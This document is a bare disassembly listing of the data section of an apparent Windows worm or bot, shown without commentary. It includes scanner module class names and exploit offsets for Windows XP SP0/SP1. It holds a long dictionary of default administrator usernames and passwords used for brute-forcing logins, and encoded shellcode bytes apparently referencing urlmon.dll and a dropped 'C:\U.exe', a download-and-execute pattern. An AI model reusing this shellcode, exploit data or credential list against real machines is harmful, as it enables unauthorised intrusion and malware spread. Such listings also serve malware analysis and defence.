off_423FA0 dd offset sub_41059E ; DATA XREF: sub_4069D7+65F�r
; sub_40F70B+4B�w
off_423FA4 dd offset sub_41059E ; DATA XREF: sub_4069D7+640�r
; sub_40F70B+55�w
align 10h
dword_423FB0 dd 19930520h, 3 dup(0) ; DATA XREF: sub_40EC54+2�o
; sub_40EC5D+2�o
dword_423FC0 dd 2694h ; DATA XREF: sub_40FDF4+3�r
; sub_40FE47+5D�r
dd 9875h, 9873h, 0
dword_423FD0 dd 14h ; DATA XREF: sub_40FD56:loc_40FD5E�r
off_423FD4 dd offset aExp ; DATA XREF: sub_40FD56:loc_40FDCE�r
; "exp"
dd 1Dh, 41DC18h, 1Ah, 41DC08h, 1Bh, 41DC0Ch, 1Fh, 41EE10h
dd 13h, 41EE08h, 21h, 41EE00h, 0Eh, 41DC00h, 0Dh, 41DBF8h
dd 0Fh, 41DBDCh, 10h, 41EDF8h, 5, 41EDF0h, 1Eh, 41DBC0h
dd 12h, 41DBBCh, 20h, 41DBB8h, 0Ch, 41DBD4h, 0Bh, 41DBCCh
dd 15h, 41EDE8h, 1Ch, 41DBC4h, 19h, 41EDE0h, 11h, 41EDD8h
dd 18h, 41EDD0h, 16h, 41EDC8h, 17h, 41EDC0h, 22h, 41EDBCh
dd 23h, 41EDB8h, 24h, 41EDB4h, 25h, 41EDACh, 26h, 41EDA0h
dbl_4240B8 dq 1.797693134862316e308 ; DATA XREF: sub_40FB20:loc_40FBF0�r
; sub_40FB20:loc_40FBF8�r
dd 0
dd 0FFF80000h
dbl_4240C8 dq 1.797693134862316e308 ; DATA XREF: sub_40FB20+89�r
; sub_40FB20+A4�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_4240E0 dt 2.3562723457267347066e313 ; DATA XREF: sub_410084+B�r
; sub_410084+1E�r
align 4
tbyte_4240EC dt 1.9149954921904370718e-1233 ; DATA XREF: sub_410084+30�r
align 4
dword_4240F8 dd 1 ; DATA XREF: sub_4100DA+1C�r
; sub_4100DA+4C�w
byte_4240FC db 3 ; DATA XREF: sub_4101BD+1B�r
; sub_4101BD:loc_4101FB�r
align 10h
dd 7080h, 1, 0FFFFF1F0h, 0
dword_424110 dd 545350h, 0Fh dup(0) ; DATA XREF: .kSjx934:00424190�o
dword_424150 dd 544450h, 0Fh dup(0) ; DATA XREF: .kSjx934:00424194�o
dd offset dword_424110
dd offset dword_424150
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch
dword_424218 dd 2 ; DATA XREF: sub_4104DC+13�r
; sub_4104DC+4F�r ...
align 10h
dword_424220 dd 0FFFFFFFEh ; DATA XREF: sub_41144A:loc_411463�r
dword_424224 dd 0FFFFFFFEh ; DATA XREF: sub_4104DC+1B�r
; sub_4104DC:loc_410505�r ...
align 10h
dword_424230 dd 400h ; DATA XREF: sub_411969:loc_411D0D�r
; sub_411969+44D�r
dword_424234 dd 0FFFFFC01h ; DATA XREF: sub_411969:loc_411AD8�r
dword_424238 dd 35h ; DATA XREF: sub_411969+78�r
; sub_411969+176�r ...
dword_42423C dd 0Bh ; DATA XREF: sub_411969:loc_411C74�r
; sub_411969+3AA�r ...
dword_424240 dd 40h ; DATA XREF: sub_411969+519�r
dword_424244 dd 3FFh ; DATA XREF: sub_411969+452�r
; sub_411969:loc_411DCC�r
dword_424248 dd 80h ; DATA XREF: sub_411EAB:loc_41224F�r
; sub_411EAB+44D�r
dword_42424C dd 0FFFFFF81h ; DATA XREF: sub_411EAB:loc_41201A�r
dword_424250 dd 18h ; DATA XREF: sub_411EAB+78�r
; sub_411EAB+176�r ...
dword_424254 dd 8 ; DATA XREF: sub_411EAB:loc_4121B6�r
; sub_411EAB+3AA�r ...
dword_424258 dd 20h ; DATA XREF: sub_411EAB+519�r
dword_42425C dd 7Fh ; DATA XREF: sub_411EAB+452�r
; sub_411EAB:loc_41230E�r
dword_424260 dd 2 dup(0) ; DATA XREF: sub_4123ED+363�o
; sub_412AB1+18E�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4243C0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_4123ED+37A�o
; sub_412AB1+1B3�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dd offset aBadAllocation ; "bad allocation"
dd offset dword_41EF18
dword_424528 dd 4Eh ; DATA XREF: sub_401F1C+C8�r
; sub_40251A+57�r ...
dd 7 dup(0)
dword_424548 dd 8Bh ; DATA XREF: sub_401F1C+3FE�r
; sub_40251A+77�r ...
dword_42454C dd 0 ; DATA XREF: sub_40251A:loc_40256B�r
; sub_41A8D5+E8�r ...
off_424550 dd offset sub_41A9DE ; DATA XREF: .kSjx934:00413C39�r
; .kSjx934:00413D4A�r ...
dd 4Dh, 7 dup(0)
dd 599h, 0
dd offset sub_41B1A0
dd 53h, 7 dup(0)
dd 0B97h, 0
dd offset sub_41A8D5
dd 0Bh dup(0)
dd offset aBadAllocatio_0 ; "bad allocation"
dword_4245DC dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_41A5C1+205�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 0
dword_424604 dd 6EB4141h, 501E100Dh, 6D6Dh, 41EF94h ; DATA XREF: sub_41A5C1+2B4�o
dword_424614 dd 5C0D0A00h, 2E2F5Fh ; DATA XREF: sub_41A9DE+4A3�o
dword_42461C dd 0EFFFC481h, 44FFFFh, 41EFA4h ; DATA XREF: sub_41A9DE+321�o
dword_424628 dd 42Ah ; DATA XREF: sub_41A9DE+2CB�r
dword_42462C dd 3E8h ; DATA XREF: sub_41A9DE+4ED�r
dword_424630 dd 258h ; DATA XREF: sub_41A9DE+318�r
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dword_424644 dd 20804h ; DATA XREF: sub_41A9DE+506�r
; sub_41A9DE+512�r ...
dd offset aBadAllocatio_2 ; "bad allocation"
dd offset aBadAllocatio_3 ; "bad allocation"
off_424650 dd offset byte_41EF0B ; DATA XREF: sub_41B1A0:loc_41B27D�r
; sub_41B1A0+EE�o
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem_0 ; "system"
dd offset aServer ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter_0 ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob_0 ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa_0 ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet_0 ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dd offset aBadAllocatio_4 ; "bad allocation"
dd offset aBadAllocatio_5 ; "bad allocation"
dd offset aBadAllocatio_6 ; "bad allocation"
dd offset aBadAllocatio_7 ; "bad allocation"
dd offset aBadAllocatio_8 ; "bad allocation"
dword_424894 dd 22B1C933h, 74D9EED9h, 805BF424h, 8000146Bh, 8300156Bh
; DATA XREF: sub_41411F+78�o
dd 0F3E2FEEBh, 0
dword_4248B0 dd 22B1C933h, 74D9EED9h, 805BF424h, 80001473h, 83001573h
; DATA XREF: sub_41411F+182�o
dd 0F3E2FEEBh, 2 dup(0)
dword_4248D0 dd 758B54EBh, 35748B3Ch, 56F50378h, 320768Bh, 49C933F5h
; DATA XREF: sub_41432A+38�o
dd 0DB33AD41h, 14BE0F36h, 74F23828h, 0DCBC108h, 0EB40DA03h
dd 75DF3BEFh, 5E8B5EE7h, 66DD0324h, 8B4B0C8Bh, 0DD031C5Eh
dd 38B048Bh, 7275C3C5h, 6E6F6D6Ch, 6C6C642Eh, 5C3A4300h
dd 78652E55h, 0C0330065h, 30400364h, 408B0C78h, 1C708B0Ch
dd 8408BADh, 408B09EBh, 7C408D34h, 953C408Bh, 0E4E8EBFh
dd 0FF84E8ECh, 0EC83FFFFh, 242C8304h, 95D0FF3Ch, 1A36BF50h
dd 6FE8702Fh, 8BFFFFFFh, 8DFC2454h, 0DB33BA52h, 0EB525353h
dd 0D0FF5324h, 0FE98BF5Dh, 53E80E8Ah, 83FFFFFFh, 2C8304ECh
dd 0D0FF6224h, 0E0CEEFBFh, 0FF40E860h, 0FF52FFFFh, 0FFD7E8D0h
dd 0FFFFh, 0
dd 0FF000000h, 0FFFF0000h, 0FFFFFF00h, 80000000h, 800000h
dd 8000h, 80h, 4200D0h
dword_4249C0 dd 0 ; DATA XREF: sub_416AE0+6E�r
dword_4249C4 dd 0 ; DATA XREF: sub_416AE0+75�r
dd 0
dd 0FF000000h, 0
dd 0FFFF0000h, 0
dd 0FFFFFF00h, 0
dd 0FFFFFFFFh, 0FF000000h, 0FFFFFFFFh, 0FFFF0000h, 0FFFFFFFFh
dd 0FFFFFF00h, 0FFFFFFFFh
dword_424A00 dd 0 ; DATA XREF: sub_416AE0+8B�r
dword_424A04 dd 80000000h ; DATA XREF: sub_416AE0+91�r
dd 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 80000000h, 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 0
dd offset dword_4200D0+10h
dd offset aBadAllocatio_9 ; "bad allocation"
dword_424A48 dd 0BBEDEDF4h, 0E1F0FBFCh, 0FBBBF6E5h, 0E1F0h, 7Ch dup(0)
; DATA XREF: .kSjx934:0041C020�o
dword_424C48 dd 0E5F4A6E7h, 0E7A6h, 7Eh dup(0) ; DATA XREF: .kSjx934:0041C01B�o
word_424E48 dw 1D45h ; DATA XREF: .kSjx934:loc_41C013�r
align 10h
aHjdxzopvuvmrjf db 'hJdXZOPvUVmRJfVS',0 ; DATA XREF: sub_4196D1:loc_4196FC�o
; sub_4196D1+44�r
align 4
dd 1Bh dup(0)
dword_424ED0 dd 0EDF4B6B6h, 0EDh, 3Eh dup(0) ; DATA XREF: sub_41783D+2A9�o
; sub_41783D+375�o ...
dword_424FD0 dd 0D5EDEDF4h, 0D5h, 4 dup(0) ; DATA XREF: sub_41783D+2FF�o
; sub_41783D+38F�o
byte_424FE8 db 2Eh ; DATA XREF: sub_417676+E4�r
byte_424FE9 db 0B8h, 0EDh, 0 ; DATA XREF: sub_41783D+3A5�o
dd 0Dh dup(0)
db 0
byte_425021 db 0BFh, 0D5h, 0F4h ; DATA XREF: sub_41783D+611�o
dd 0FBBBEDEDh, 0E1F0h, 0Dh dup(0)
db 0
byte_425061 db 0EFh, 0F8h, 0FAh ; DATA XREF: sub_401C1D+60�o
; sub_416F86+B8�o ...
dd 0EDF0BBFBh, 0F0h, 1Dh dup(0)
db 0
byte_4250E1 db 0CFh, 0F8h, 0A5h ; DATA XREF: .kSjx934:0041BEC5�o
dd 0FBh, 0Ch dup(0)
db 0
byte_425119 db 0CFh, 2 dup(0) ; DATA XREF: sub_416F86+A4�o
; sub_417119+7C�o ...
dd 40h dup(0)
dword_42521C dd 8 ; DATA XREF: sub_41748B+174�r
; sub_41748B+1B1�r
db 78h, 0Ch
byte_425222 db 1 ; DATA XREF: sub_40177B+8F�r
; sub_4019F3+8F�r
align 4
dd offset aBadAllocati_10 ; "bad allocation"
aGdbdADjmGjZJJN db 'У¤¡¤ÓÑ ×ÐÓ¤¦¬Ñ£¦Ó§Ô¦Ð¦ÐÑÑÐÑÖÐÑ ÐѦ§£¤Ö¤Ô¤ÐÔÓÑЧ¤¢§¥ ££ÑÖÐצӥ'
db 'Ö¢Ó¬£ÔÖ¡¤£¢¥¡Ô¡Ó¡×Ѭ¬Ó¬¤Ó§£ÖÓЦ§Ð×£¤¢¡¦§ צ¢×פ¡Ð×Ô ÔÖ',0
align 4
dd 70h dup(0)
aNbEdGzDdnbgNdZ db '¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ¬¬¤¡Ð ¬Ô¤Ð£××¢¢¡×£¢§§Ó£¬'
; DATA XREF: sub_4019F3+7C�o
db 'У¬¢¢Ô¡¬§Ó¤Ñ¡¦¥¡¢ÑÓ¤¢¡ÖÐ׬Ԭ ÐÔ¡¦Ö×£¡§ §££¢£××Ч¢×ÑÖ Ð¦Ð ',0
align 4
dd 10h dup(0)
dword_425528 dd 0DED6DCDBh, 0 ; DATA XREF: sub_41802F+216�o
; sub_41829C+27�o
db 0
byte_425531 db 0C5h, 0D4h, 0C6h ; DATA XREF: sub_41802F+13E�o
dd 0C6h
db 2 dup(0)
word_42553A dw 0C6C0h ; DATA XREF: sub_41802F+227�o
dd 0C7D0h
db 3 dup(0)
byte_425543 db 0C5h ; DATA XREF: sub_41783D+1CF�o
dd 0D2DBDCh, 0
dword_42554C dd 0D2DBDAC5h, 0 ; DATA XREF: sub_41783D+22F�o
db 0
byte_425555 db 0DEh, 0DCh, 0D6h ; DATA XREF: sub_41783D+1DF�o
dd 0DEh
db 2 dup(0)
word_42555E dw 0DADFh ; DATA XREF: sub_41783D+2EC�o
; sub_41783D+355�o
dd 0DBDCh
db 3 dup(0)
byte_425567 db 0D8h ; DATA XREF: sub_41783D+365�o
dd 0D0D1DAh, 0
dword_425570 dd 0C3DCC7C5h, 0D2C6D8h, 2 dup(0) ; DATA XREF: sub_417361+A4�o
; sub_41783D+1EF�o
dword_425580 dd 0E5E1E1FDh, 0E2BABAAFh, 0F1BBE2E2h, 0F0FEFBF0h, 0F0E3FAFBh
; DATA XREF: sub_41A5C1+123�o
; sub_41A9DE+408�o
dd 0FBF0F1E7h, 0BBFBF0FEh, 0E2BAF9FBh, 0FAF9F7F0h, 0F8FCBAF2h
dd 0E6F0F2F4h, 0FAF8EFBAh, 0EDF0BBFBh, 0F0h, 420350h
dword_4255BC dd 5348h, 4204B8h, 4204D4h, 4206C8h, 4206D8h, 42070Ch
; DATA XREF: sub_418C40+20�o
; sub_418C40+8E�o
dd 42071Ch, 420734h
dword_4255DC dd 80000002h, 80000001h, 420A4Ch ; DATA XREF: sub_419A9F+6B�o
dword_4255E8 dd 0CA975201h, 0A811D059h, 0D5h, 1Dh dup(0) ; DATA XREF: sub_4198D2+3D�o
dd 9, 0C5C1371Dh, 6379AB46h, 8Fh, 1Dh dup(0)
dd 9, 7D8AAFA8h, 0F4BE11C9h, 8, 1Dh dup(0)
dd 9, 9F499642h, 0F537FD4Ah, 0D6h, 1Dh dup(0)
dd 9, 123485E9h, 411291D9h, 12h, 1Dh dup(0)
dd 9, 5EB02EBh, 0FFFFF9E8h, 0FFh, 1Dh dup(0)
dd 9
off_425900 dd offset off_41D38C ; DATA XREF: .kSjx934:00420E8C�o
; .kSjx934:00420EAC�o
align 8
a_?avclsmodule@ db '.?AVclsModule@@',0
off_425918 dd offset off_41D38C ; DATA XREF: .kSjx934:00420ED4�o
; .kSjx934:00420EFC�o ...
align 10h
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_425938 dd offset off_41D38C ; DATA XREF: .kSjx934:00420F24�o
; .kSjx934:00420F48�o ...
align 10h
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_425958 dd offset off_41D38C ; DATA XREF: .kSjx934:00420DE4�o
; .kSjx934:00420F94�o ...
align 10h
a_?avexception@ db '.?AVexception@std@@',0
off_425974 dd offset off_41D38C ; DATA XREF: .kSjx934:00420F70�o
; .kSjx934:00420FC8�o ...
dd 0
a_?avbad_alloc@ db '.?AVbad_alloc@std@@',0
off_425990 dd offset off_41D38C ; DATA XREF: .kSjx934:00420FF0�o
; .kSjx934:00421014�o
align 8
dd 56413F2Eh, 556C646Dh, 40404450h, 0
off_4259A8 dd offset off_41D38C ; DATA XREF: .kSjx934:0042103C�o
; .kSjx934:00421060�o
align 10h
dd 56413F2Eh, 446C646Dh, 40404Ch
off_4259BC dd offset off_41D38C ; DATA XREF: .kSjx934:00421088�o
; .kSjx934:004210AC�o
dd 0
a_?avmdlhttpinf db '.?AVmdlHTTPInfo@@',0
align 4
off_4259D8 dd offset off_41D38C ; DATA XREF: .kSjx934:004210D4�o
; .kSjx934:004210F8�o
align 10h
a_?avmdlnetinfo db '.?AVmdlNetInfo@@',0
align 4
off_4259F4 dd offset off_41D38C ; DATA XREF: .kSjx934:00421120�o
; .kSjx934:00421144�o
dd 0
a_?avmdlsysinfo db '.?AVmdlSysInfo@@',0
align 10h
off_425A10 dd offset off_41D38C ; DATA XREF: .kSjx934:0042116C�o
; .kSjx934:00421190�o
align 8
a_?avmdlscansta db '.?AVmdlScanStats@@',0
align 4
off_425A2C dd offset off_41D38C ; DATA XREF: .kSjx934:004211B8�o
; .kSjx934:004211DC�o
dd 0
a_?avmdlscansto db '.?AVmdlScanStop@@',0
align 4
off_425A48 dd offset off_41D38C ; DATA XREF: .kSjx934:00421204�o
; .kSjx934:00421228�o
align 10h
a_?avmdlscanner db '.?AVmdlScanner@@',0
align 4
dd 7 dup(0)
dword_425A80 dd 0 ; DATA XREF: sub_402E33+4�w
; sub_402F39+3�r
dword_425A84 dd 0 ; DATA XREF: .kSjx934:0041C52A�w
; .kSjx934:0041C534�o
align 10h
dword_425A90 dd 0 ; DATA XREF: sub_40304B:loc_40306F�r
; sub_40304B+32�w
dword_425A94 dd 0 ; DATA XREF: .kSjx934:00404055�w
; sub_40ABE1:loc_40ABF3�r ...
dd 0
dword_425A9C dd 0 ; DATA XREF: sub_403ED3�r
; sub_40F6C2+15�r ...
dword_425AA0 dd 0 ; DATA XREF: sub_40468E+8F�w
; .kSjx934:off_41D3F8�o
dword_425AA4 dd 0 ; DATA XREF: sub_40468E+99�w
dd 0
dword_425AAC dd 0 ; DATA XREF: sub_40468E+8A�w
dd 10h dup(0)
dword_425AF0 dd 0 ; DATA XREF: sub_40468E+BF�w
; sub_40468E+DF�r
align 8
dword_425AF8 dd 0 ; DATA XREF: sub_40468E+7B�w
; .kSjx934:0041D3FC�o
dd 22h dup(0)
word_425B84 dw 0 ; DATA XREF: sub_40468E+4F�w
align 4
word_425B88 dw 0 ; DATA XREF: sub_40468E+48�w
align 4
word_425B8C dw 0 ; DATA XREF: sub_40468E+41�w
align 10h
word_425B90 dw 0 ; DATA XREF: sub_40468E+3A�w
align 4
dword_425B94 dd 0 ; DATA XREF: sub_40468E+26�w
dword_425B98 dd 0 ; DATA XREF: sub_40468E+20�w
dword_425B9C dd 0 ; DATA XREF: sub_40468E+1A�w
dword_425BA0 dd 0 ; DATA XREF: sub_40468E+14�w
dword_425BA4 dd 0 ; DATA XREF: sub_40468E+E�w
dword_425BA8 dd 0 ; DATA XREF: sub_40468E+9�w
dword_425BAC dd 0 ; DATA XREF: sub_40468E+60�w
dword_425BB0 dd 0 ; DATA XREF: sub_40468E+68�w
; sub_40468E+85�r
word_425BB4 dw 0 ; DATA XREF: sub_40468E+33�w
align 4
dword_425BB8 dd 0 ; DATA XREF: sub_40468E+57�w
dword_425BBC dd 0 ; DATA XREF: sub_40468E+70�w
word_425BC0 dw 0 ; DATA XREF: sub_40468E+2C�w
align 4
dd 80h dup(0)
dword_425DC4 dd 0 ; DATA XREF: sub_404A44+15�w
; sub_404A44+1D�w ...
word_425DC8 dw 0 ; DATA XREF: sub_404C69+E7�w
align 4
dd 2 dup(0)
dword_425DD4 dd 0 ; DATA XREF: sub_404C69+C3�w
dword_425DD8 dd 0 ; DATA XREF: sub_404C69+CB�w
dword_425DDC dd 0 ; DATA XREF: sub_404C69+D3�w
dword_425DE0 dd 0 ; DATA XREF: sub_4028A9+6�r
; sub_4029E9+6�r ...
dd 8 dup(0)
dword_425E04 dd 0 ; DATA XREF: sub_4054D6+30�w
; sub_4054D6+51�r ...
dword_425E08 dd 0 ; DATA XREF: sub_4051FF+10�r
; sub_4054D6+3D�w ...
dword_425E0C dd 0 ; DATA XREF: sub_40531A+44�r
; sub_4054D6+4A�w ...
dword_425E10 dd 0 ; DATA XREF: sub_405229+B�r
; sub_4054D6+5E�w ...
align 8
dword_425E18 dd 54h dup(0) ; DATA XREF: sub_405881+4�o
dword_425F68 dd 0 ; DATA XREF: sub_402A45+7C�r
; sub_403603+62�r ...
dword_425F6C dd 0 ; DATA XREF: sub_405ADD+21�w
; sub_405B50+21C�r ...
dword_425F70 dd 0 ; DATA XREF: sub_40773A+14�r
; sub_40773A+29�r ...
dword_425F74 dd 0 ; DATA XREF: sub_40E072+19E�r
dword_425F78 dd 0 ; DATA XREF: .kSjx934:00403FE0�w
; sub_407906:loc_40792E�r ...
dword_425F7C dd 0 ; DATA XREF: .kSjx934:00403FF7�w
dword_425F80 dd 0 ; DATA XREF: .kSjx934:00403FE6�w
dword_425F84 dd 0 ; DATA XREF: .kSjx934:00403FEB�w
; sub_40793D+30�r
dword_425F88 dd 0 ; DATA XREF: .kSjx934:00403FF1�w
dword_425F8C dd 0 ; DATA XREF: sub_40AE54+A2�w
dword_425F90 dd 0 ; DATA XREF: sub_40AE54+A7�w
align 8
dword_425F98 dd 0 ; DATA XREF: sub_40ABE1+4B�w
; sub_40ABE1:loc_40ACA6�r ...
dd 3 dup(0)
dword_425FA8 dd 0 ; DATA XREF: sub_40AE54+37�w
align 10h
byte_425FB0 db 0 ; DATA XREF: sub_407A0B+2C�w
; sub_40813B+5�r
align 4
dword_425FB4 dd 0 ; DATA XREF: sub_407A0B+23�w
dword_425FB8 dd 0 ; DATA XREF: sub_407A0B+1B�r
; sub_407A0B+A0�w
dword_425FBC dd 0 ; DATA XREF: sub_407F55+27�o
dword_425FC0 dd 0 ; DATA XREF: sub_407F55+22�r
dword_425FC4 dd 0 ; DATA XREF: sub_408058+4�w sub_408062�r
dword_425FC8 dd 0 ; DATA XREF: sub_4081FF+280�w
; sub_40871B:loc_408751�w ...
dd 3 dup(0)
dword_425FD8 dd 6 dup(0) ; DATA XREF: sub_409AB4+66�o
db 0
byte_425FF1 db 3 dup(0) ; DATA XREF: sub_409AB4+8A�o
dd 40h dup(0)
db 0
byte_4260F5 db 0 ; DATA XREF: sub_409AB4+92�w
align 4
dd 7Dh dup(0)
dword_4262EC dd 0 ; DATA XREF: sub_4036E0+80�r
; sub_409AB4+E3�o ...
dword_4262F0 dd 0 ; DATA XREF: sub_40A42B+8�r
align 8
dword_4262F8 dd 41h dup(0) ; DATA XREF: sub_40AE54+1D�o
byte_4263FC db 0 ; DATA XREF: sub_40AE54+24�w
align 10h
dword_426400 dd 0 ; DATA XREF: sub_40AF0D+2�r
; sub_40AF0D+24�w ...
dword_426404 dd 0 ; DATA XREF: sub_40B11E+43�r
; sub_40B18A+11�w ...
byte_426408 db 0 ; DATA XREF: sub_40B11E:loc_40B157�r
; sub_40B18A+17�w ...
align 4
dword_42640C dd 0 ; DATA XREF: sub_40BEA5+C�r
; sub_40BEDC+B�w
